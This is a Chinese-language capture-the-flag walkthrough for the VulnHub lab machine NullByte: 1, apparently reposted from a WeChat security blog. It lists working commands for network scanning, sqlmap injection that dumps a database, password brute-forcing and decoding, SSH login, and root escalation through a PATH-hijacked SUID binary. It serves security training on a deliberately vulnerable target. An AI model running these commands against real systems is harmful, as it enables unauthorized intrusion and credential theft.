虚拟机下载地址:https://www.vulnhub.com/entry/nullbyte-1,126/虚拟机简介:访问/root/proof. txt目标:1个flag级别:中级
1、信息收集
1.1通过arp-scan检测主机IP地址
arp-scan 192.168.207.0/24
1.2 通过nmap进行端口扫描
nmap -A -sS -sV -v -p- 192.168.207.134
查看开放80、111、777、53793端口
2、渗透测试
2.1 WEB渗透
1.访问站点查看到图片
获取图片文件进行分析,发现一段提示内容
exiftool main.gif
2.访问提示页面
根据提示访问页面后,显示输入key内容
使用BP结合rockyou.txt字典进行爆破,发现key密码为:elite
3.SQLMap爆破
访问页面后提示输入用户名
随便输入内容会进行查询
使用sqlmap进行爆破测试,获取到数据库信息
sqlmap -u "http://192.168.207.135/kzMb5nVYJw/420search.php?usrtosearch=1" --dbs --batch
爆破数据内容
sqlmap -u "http://192.168.207.135/kzMb5nVYJw/420search.php?usrtosearch=1" -D seth --dump-all --batch
需要把获取到的密码进行base64解密,再使用MD5进行解密,获取到密码为:omega
echo "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE=" | base64 -d
2.2 主机渗透
1.通过SSH进行登录
ssh [email protected] -p 777
2.查找拥有SUID文件
发现procwatch存在suid权限
find / -perm -u=s -type f 2>/dev/null
3.分析文件
执行文件后根据输出信息,发现类似于调用系统PS命令
cd /var/www/backup/
./procwatch
4.环境变量提权
发现已经获取到root权限
echo "/bin/sh" > ps
chmod 777 ps
echo $PATH
export PATH=.:$PATH
echo $PATH
./procwatch
5.获取Flag
cd /root
proof.txt
原文始发于微信公众号(安全孺子牛):OSCP难度靶机之NullByte: 1
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论